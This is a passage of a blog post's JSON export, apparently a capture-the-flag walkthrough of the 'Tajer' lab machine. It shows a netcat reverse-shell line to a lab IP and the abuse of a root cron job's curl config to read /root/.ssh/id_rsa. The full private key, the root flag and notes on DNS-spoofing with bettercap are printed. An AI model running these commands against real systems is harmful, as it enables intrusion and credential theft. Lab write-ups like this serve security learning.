1  2022 opt\ndr-xr-xr-x 155 root root     0 Apr  6 02:55 proc\ndrwx------   3 root root  4096 Apr  1  2022 root\ndrwxr-xr-x  19 root root   560 Apr  6 02:55 run\nlrwxrwxrwx   1 root root     8 Jan 12  2022 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root  4096 Jan 12  2022 srv\ndr-xr-xr-x  13 root root     0 Apr  6 02:55 sys\ndrwxrwxrwt   9 root root  4096 Apr  6 05:09 tmp\ndrwxr-xr-x  14 root root  4096 Jan 12  2022 usr\ndrwxr-xr-x  12 root root  4096 Mar 31  2022 var\nlrwxrwxrwx   1 root root    28 Mar 31  2022 vmlinuz -&gt; 
boot\/vmlinuz-5.10.0-13-amd64\nlrwxrwxrwx   1 root root    28 Mar 31  2022 vmlinuz.old -&gt; boot\/vmlinuz-5.10.0-13-amd64\n(remote) kevin@tajer:\/$ cd \/bin\/local\nbash: cd: \/bin\/local: No such file or directory\n(remote) kevin@tajer:\/$ cd usr\/local\/bin\n(remote) kevin@tajer:\/usr\/local\/bin$ ls -la\ntotal 80\ndrwxr-xr-x  3 root root 4096 Apr  1  2022 .\ndrwxr-xr-x 10 root root 4096 Jan 12  2022 ..\n-rwxr-xr-x  1 root root  215 Mar 31  2022 cmark\n-rwxr-xr-x  1 root root  214 Mar 31  2022 deep\n-rwxr-xr-x  1 root root  207 Mar 31  2022 dotenv\n-rwxr-xr-x  1 root root 1651 Mar 31  2022 get_objgraph\n-rwxr-xr-x  1 root root 1695 Mar 31  2022 jp.py\n-rwxr-xr-x  1 root root  211 Mar 31  2022 pbr\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip3\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip3.9\ndrwxr-xr-x  2 root root 4096 Mar 31  2022 __pycache__\n-rwxr-xr-x  1 root root  216 Apr  1  2022 pydisasm\n-rwxr-xr-x  1 root root  215 Mar 31  2022 pygmentize\n-rwxr-xr-x  1 root root  205 Mar 31  2022 pysemver\n-rwxr-xr-x  1 root root  205 Mar 31  2022 pytail\n-rwxr-xr-x  1 root root 2078 Apr  1  2022 spark-parser-coverage\n-rwxr-xr-x  1 root root  209 Mar 31  2022 tabulate\n-rwxr-xr-x  1 root root  587 Mar 31  2022 undill\n-rwxr-xr-x  1 root root  208 Mar 31  2022 wheel\n(remote) kevin@tajer:\/usr\/local\/bin$ cd \/opt\n(remote) kevin@tajer:\/opt$ ls -la\ntotal 16\ndrwxrwxrwx  4 root root  4096 Apr  1  2022 .\ndrwxr-xr-x 18 root root  4096 Mar 31  2022 ..\ndrwxrwx---  2 root kevin 4096 Apr  1  2022 kevin\ndrwxr-xr-x  2 root root  4096 Apr  1  2022 scripts\n(remote) kevin@tajer:\/opt$ cd kevin\/\n(remote) kevin@tajer:\/opt\/kevin$ ls -la\ncdtotal 8\ndrwxrwx--- 2 root kevin 4096 Apr  1  2022 .\ndrwxrwxrwx 4 root root  4096 Apr  1  2022 ..\n(remote) kevin@tajer:\/opt\/kevin$ cd ..\/scripts\/;ls -la\ntotal 16\ndrwxr-xr-x 2 root root  4096 Apr  1  2022 .\ndrwxrwxrwx 4 root root  4096 Apr  1  2022 ..\n-rw-r--r-- 1 root root   886 
Apr  1  2022 code\n-r-x------ 1 root kevin  677 Apr  1  2022 curl.py\n(remote) kevin@tajer:\/opt\/scripts$ file *\ncode:    python 2.7 byte-compiled\ncurl.py: regular file, no read permission<\/code><\/pre>\n<p>Transfer the file over and take a look:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/tajer]\n\u2514\u2500$ file code                                    \ncode: python 2.7 byte-compiled\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/tajer]\n\u2514\u2500$ strings code       \nD&#039;Gbc\nscript is running in every 1 minutei\ndatetimes\n\/opt\/kevin\/input.txtt\n^((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])$s\nInvalid IPi\nfilet\nFILEs\nInvalid Urls\n%H_%M_%Ss&amp;\n\/bin\/bash -c &quot;curl -o \/tmp\/tryHarder_ s\n -K t\nsysR\nopent\nreadlinet\nstript\nuser_inputt\nregext\nboolt\nsearcht\ncheckt\nexitt\nnowt\nstrftimet\ncmdt\nsystem(\ncode.pyt\n&lt;module&gt;<\/code><\/pre>\n<p>This reveals a suspicious file, <code>\/opt\/kevin\/input.txt<\/code>, and a command, <code>\/bin\/bash -c &quot;curl -o \/tmp\/tryHarder_ s<\/code><\/p>\n<p>However, we did not see the former existing, so we try writing such a file to see what happens:<\/p>\n<pre><code class=\"language-bash\">echo &#039;nc -e \/bin\/bash 172.20.10.8 1234&#039; &gt; input.txt<\/code><\/pre>\n<p>Well, that little trick did not work; <code>pspy64<\/code> shows:<\/p>\n<pre><code class=\"language-text\">2024\/04\/06 05:49:01 CMD: UID=1001 PID=16461  | \/usr\/bin\/bash \n2024\/04\/06 05:49:01 CMD: UID=0    PID=16462  | \/usr\/bin\/python3 \/opt\/scripts\/curl.py \n2024\/04\/06 05:49:01 CMD: UID=0    PID=16463  | sh -c \/bin\/bash -c &#039;curl -o \/tmp\/result_05_49_01 -K nc -e 
\/bin\/bash 172.20.10.8 1234&#039; <\/code><\/pre>\n<p>Haha, curl.py is a scheduled task executed by root, and it also ran:<\/p>\n<pre><code class=\"language-bash\">sh -c \/bin\/bash -c &#039;curl -o \/tmp\/result_05_49_01 -K nc -e \/bin\/bash 172.20.10.8 1234&#039; <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840123.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840123.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406175259540\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Roughly speaking, it reads a config file path from <code>input.txt<\/code> and then copies the result into a file in tmp, so we can find a way to craft something for <code>root\/.ssh\/id_rsa<\/code> and then use it to log in!<\/p>\n<pre><code class=\"language-bash\"># input.txt\n\/tmp\/hack\n# \/tmp\/hack\nurl = file:\/\/\/root\/.ssh\/id_rsa<\/code><\/pre>\n<p>Give it a try!<\/p>\n<pre><code class=\"language-bash\">cd \/opt\/kevin\/\necho &#039;\/tmp\/hack&#039; &gt; input.txt \ncd \/tmp\necho &#039;url = file:\/\/\/root\/.ssh\/id_rsa&#039; &gt; hack<\/code><\/pre>\n<p>Then wait for the good news!<\/p>\n<pre><code class=\"language-bash\">(remote) kevin@tajer:\/tmp$ cd \/opt\/kevin\/\n(remote) 
kevin@tajer:\/opt\/kevin$ echo &#039;\/tmp\/hack&#039; &gt; input.txt \n(remote) kevin@tajer:\/opt\/kevin$ cd \/tmp\n(remote) kevin@tajer:\/tmp$ echo &#039;url = file:\/\/\/root\/.ssh\/id_rsa&#039; &gt; hack\n(remote) kevin@tajer:\/tmp$ ls -la\ntotal 5280\ndrwxrwxrwt  9 root     root        4096 Apr  6 06:07 .\ndrwxr-xr-x 18 root     root        4096 Mar 31  2022 ..\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .font-unix\n-rw-r--r--  1 kevin    kevin         31 Apr  6 06:07 hack\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .ICE-unix\n-rwxrwxrwx  1 www-data www-data  860549 Mar 25 11:56 linpeas.sh\n-rwxrwxrwx  1 www-data www-data 4468984 Mar 23 04:32 pspy64\n-rw-r--r--  1 root     root         347 Apr  6 05:49 result_05_49_01\n-rw-r--r--  1 root     root         347 Apr  6 05:50 result_05_50_01\n-rw-r--r--  1 root     root         347 Apr  6 05:51 result_05_51_01\n-rw-r--r--  1 root     root         347 Apr  6 05:52 result_05_52_01\n-rw-r--r--  1 root     root         347 Apr  6 05:53 result_05_53_01\n-rw-r--r--  1 root     root         347 Apr  6 05:54 result_05_54_01\n-rw-r--r--  1 root     root         347 Apr  6 05:55 result_05_55_01\ndrwx------  3 root     root        4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-logind.service-GjHWlh\ndrwx------  3 root     root        4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-timesyncd.service-c42Ysf\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .Test-unix\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .X11-unix\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .XIM-unix\n(remote) kevin@tajer:\/tmp$ ls -la\ntotal 5284\ndrwxrwxrwt  9 root     root        4096 Apr  6 06:08 .\ndrwxr-xr-x 18 root     root        4096 Mar 31  2022 ..\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .font-unix\n-rw-r--r--  1 kevin    kevin         31 Apr  6 06:07 hack\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .ICE-unix\n-rwxrwxrwx  1 
www-data www-data  860549 Mar 25 11:56 linpeas.sh\n-rwxrwxrwx  1 www-data www-data 4468984 Mar 23 04:32 pspy64\n-rw-r--r--  1 root     root         347 Apr  6 05:49 result_05_49_01\n-rw-r--r--  1 root     root         347 Apr  6 05:50 result_05_50_01\n-rw-r--r--  1 root     root         347 Apr  6 05:51 result_05_51_01\n-rw-r--r--  1 root     root         347 Apr  6 05:52 result_05_52_01\n-rw-r--r--  1 root     root         347 Apr  6 05:53 result_05_53_01\n-rw-r--r--  1 root     root         347 Apr  6 05:54 result_05_54_01\n-rw-r--r--  1 root     root         347 Apr  6 05:55 result_05_55_01\n-rw-r--r--  1 root     root        2602 Apr  6 06:08 result_06_08_01\ndrwx------  3 root     root        4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-logind.service-GjHWlh\ndrwx------  3 root     root        4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-timesyncd.service-c42Ysf\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .Test-unix\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .X11-unix\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .XIM-unix\n(remote) kevin@tajer:\/tmp$ cat result_06_08_01 \n-----BEGIN OPENSSH PRIVATE 
KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAs9pLCYq5\/lSuraQbmqHsZzj\/2C4zB8bQOch55wOfeX3mUgH3L4S7\nNr4fEFUzWTWTke2HVwIl+7x1GODlQfGxpN8TA+kZ4B5OVDLDzjdOLMBMaBpAbeehbdDK52\nHtjYLRsQp5dCCkBHl0TkEA1CgPHaPZwdHvkU3f\/Syt8wN8TIFm0bOWLR3fG7mrVn+dvUv1\ntpPKbNbEU3hadszcKuYl2N\/Oht2OeWDrZYa+N4ETpTXCZ1mG1z1mRb9oY5u7tfPL9VemyP\nTqEFpjh24miUXCn63w58Uw+wB5OvOuWAMM1fLBiDrdiV+TLzQznw7ocdg3eYG93+tp1WFf\n6uHCNKasQYrRQrjPGEqloxYJTqD7DRmwRWTtRDPLFDlkZAT1c89UnnOOZ1whOD3j9gU6t9\n1majHKG0aL7ERIWI\/2yeksZdaop81CoT9p68cIrtJoze68F0j7rFwPgxJ8F2OtO+YoJJkj\n4bo044EGYEOcYogVxoVqdhpvj18ywCgBncIIT9y9AAAFiArlGZoK5RmaAAAAB3NzaC1yc2\nEAAAGBALPaSwmKuf5Urq2kG5qh7Gc4\/9guMwfG0DnIeecDn3l95lIB9y+Euza+HxBVM1k1\nk5Hth1cCJfu8dRjg5UHxsaTfEwPpGeAeTlQyw843TizATGgaQG3noW3Qyudh7Y2C0bEKeX\nQgpAR5dE5BANQoDx2j2cHR75FN3\/0srfMDfEyBZtGzli0d3xu5q1Z\/nb1L9baTymzWxFN4\nWnbM3CrmJdjfzobdjnlg62WGvjeBE6U1wmdZhtc9ZkW\/aGObu7Xzy\/VXpsj06hBaY4duJo\nlFwp+t8OfFMPsAeTrzrlgDDNXywYg63Ylfky80M58O6HHYN3mBvd\/radVhX+rhwjSmrEGK\n0UK4zxhKpaMWCU6g+w0ZsEVk7UQzyxQ5ZGQE9XPPVJ5zjmdcITg94\/YFOrfdZmoxyhtGi+\nxESFiP9snpLGXWqKfNQqE\/aevHCK7SaM3uvBdI+6xcD4MSfBdjrTvmKCSZI+G6NOOBBmBD\nnGKIFcaFanYab49fMsAoAZ3CCE\/cvQAAAAMBAAEAAAGBAIjAN4P21ns6mmLvQAnwitblsS\nsH3cdQ9SyqcX4k9BIll4XNdszLyKnUH7yEe\/md0ioICHsw5\/6kCgkznz3n72HkOAomKIWP\npZFB1D4tMSS3xqD1LP4kPEtKka0jecO6r4RE6ZpR40R\/sN57cIzgNLYdysojvVunceOIIG\n+Bu\/ZUAgD64vpFF0p2f3\/Sova3FgqQDz94gWjSPz7Lf7CitC5V5iwHtHg4KGRW8rUzUOOy\nn7GDkhKA3g20f0QVusGbr7eoEnU8N\/E1Cpqo+W\/r\/hINUBdC2Fn8Qm9cYQ2d8MSAFGJ4Ui\n9liANsRn\/s0yDlRpGz3co4\/St+B8Kx+oZdS21DyHYGk4bAYzSWMFZH9QGOasO1+zyVx46j\ntK5qvIluV36Nu5VIEWQM5unJDsdMxhv7n1oyFDioW88hvb8Wsg3o2KWRx7ZQR3zowXSZhu\nyPDwoS5wn3DbPRf\/cArthyESoHyKZ1wpzPWMW2ej9WhCH3vZF88QSUumHzUFJgQTZRhQAA\nAMBWgarrj36LhRPkoTAILqxNpmDryZ8xqXQvFyY3DVh4BaPzInjl160mlvZDyUTXE2P6ZM\nrXYPhXkedgoTh7UaNNHiiUSMc1oAWoIrZ7cQKwd\/TmDPD8\/EfSncC0xfPSfWm8+qP\/mXlX\n5g4T3gEFWNVBAQ3E6FI3Tc+4ZPExpRqUw9+8AZkY0ry2DufGchwQ2NFxys4p\/CEQ8vCwDR\npP+LrFisGYlNIy2eN
ISkUILWy6f2\/0NuhbzOBofelvLfa44CsAAADBAOBXNV9q8HY\/A1jw\n3HX+vctSy\/9uiifwNgui6jNTN3CHxMqZo\/iUZjxWvLhnHYQ\/R31CIG3EjFZPSwqRTRzF7u\nAuilX+GWol2tys7x2iUFSRdp0aHbJAzGVPYZmYKK4N0rJaDrhpVhC4Z6W0ekOl+QlZxdG6\nE0F3xsSM7ufyLf+lpxFVNyKi5Kw6cvY0b8Cakbl1rbS5HVHOi5pzg6nl7zY0slNvY3PkqV\njXGZTIAFwI41otl\/MoWXLlTScSnR+bawAAAMEAzTvcdoxmIGnDOKNLijxrp1SIGhwOjxpz\n63jwMOtAF4FkU+YyHNw20ArlAlQpSEpVWHzVn13s6+EEtypTpbNt5bP5KAJaP7dtl\/oext\nHCe8+7BUzlmKIA6nW+3SYHHd4RBipZPtz6FBXUj1H6CW79quUpWrSOWnUwamLWj0l1Pm3C\nAB8sFJTWBaUJbZ3l825wpm1L5cySGUSJVRLxcFYPOcCr0pN0dlC1I76wPVCF+8BOsct85F\nbJu2rgsqqHsVp3AAAADXJvb3RAZnJlZTRhbGwBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n(remote) kevin@tajer:\/tmp$ chmod 600 result_06_08_01 \nchmod: changing permissions of &#039;result_06_08_01&#039;: Operation not permitted\n(remote) kevin@tajer:\/tmp$ cp result_06_08_01 root\n(remote) kevin@tajer:\/tmp$ chmod 600 root\n(remote) kevin@tajer:\/tmp$ ssh root@127.0.0.1 -i root\nThe authenticity of host &#039;127.0.0.1 (127.0.0.1)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:1IIQzX\/9JIhzpVThO1Os63ec47EM+GUjaOKa9WMeJ7Q.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
yes\nWarning: Permanently added &#039;127.0.0.1&#039; (ECDSA) to the list of known hosts.\nLinux tajer 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Fri Apr  1 13:51:42 2022\nroot@tajer:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@tajer:~# cd \/root\nroot@tajer:~# cat root.txt\nad8058a084bee8a14a6f23efa52d39d0<\/code><\/pre>\n<p>Got the flag!!!<\/p>\n<h2>Additional Takeaways<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1Tm411r7wX\/?spm_id_from=333.337.search-card.all.click&amp;vd_source=8981ead94b755f367ac539f6ccd37f77\">The group owner's video<\/a> covers how to carry out DNS spoofing when <code>etc\/hosts<\/code> cannot be modified, which is the most common situation in reality; this uses a tool called <code>bettercap<\/code>:<\/p>\n<p><a href=\"https:\/\/github.com\/bettercap\/bettercap\">https:\/\/github.com\/bettercap\/bettercap<\/a><\/p>\n<blockquote>\n<p>The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 network reconnaissance and MITM attacks.<\/p>\n<p>bettercap is a powerful, easily extensible and portable framework written in Go that aims to offer security researchers, red teamers and reverse engineers an <strong>easy to use, all-in-one solution<\/strong> with all the features they might need for performing reconnaissance and attacking <a href=\"https:\/\/www.bettercap.org\/modules\/wifi\/\">WiFi<\/a> networks, <a href=\"https:\/\/www.bettercap.org\/modules\/ble\/\">Bluetooth Low Energy<\/a> devices, wireless <a href=\"https:\/\/www.bettercap.org\/modules\/hid\/\">HID<\/a> devices and <a href=\"https:\/\/www.bettercap.org\/modules\/ethernet\">Ethernet<\/a> networks.<\/p>\n<\/blockquote>\n<p>To avoid cheating, remove the DNS entry added earlier:<\/p>\n<pre><code class=\"language-css\">root@tajer:~# vim \/etc\/hosts\nroot@tajer:~# cat \/etc\/hosts\n127.0.0.1       localhost\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\nroot@tajer:~# ip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:c7:81:88 brd ff:ff:ff:ff:ff:ff\n    inet 172.20.10.4\/28 brd 172.20.10.15 scope global dynamic enp0s3\n       valid_lft 74203sec preferred_lft 74203sec\n    inet6 fe80::a00:27ff:fec7:8188\/64 scope link \n       valid_lft forever preferred_lft 
forever<\/code><\/pre>\n<p>Follow the steps from the group owner's video: (The first time nothing came back, which gave me a scare; I later found that the shell was coming back on port 2345 while I was listening on port 1234...)<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840125.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840125.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406183125370\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Then I forgot to start the HTTP service....<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840126.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840126.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406183339189\" 
style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840127.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840127.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406183348537\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061834328.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061834328.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406183358898\" \/><\/div><\/p>\n<p>\u62ff\u5230shell\uff01\uff01\uff01\uff01\u8fdb\u4e00\u6b65\u7684\u539f\u7406\uff0c\u8fd8\u662f\u5f97\u770b\u7fa4\u4e3b\u5e08\u5085\u7684\u89c6\u9891https:\/\/www.bilibili.com\/video\/BV1Tm411r7wX\/?spm_id_from=333.337.search-card.all.click&amp;vd_source=8981ead94b755f367ac539f6ccd37f77<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tajer 
Today I heard the group owner say this one seems to be WiFi-related, so let's give it a try: Information gathering Port scanning rustscan -a 172 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-512","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/512","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=512"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/512\/revisions"}],"predecessor-version":[{"id":513,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/512\/revisions\/513"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=512"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=512"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=512"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}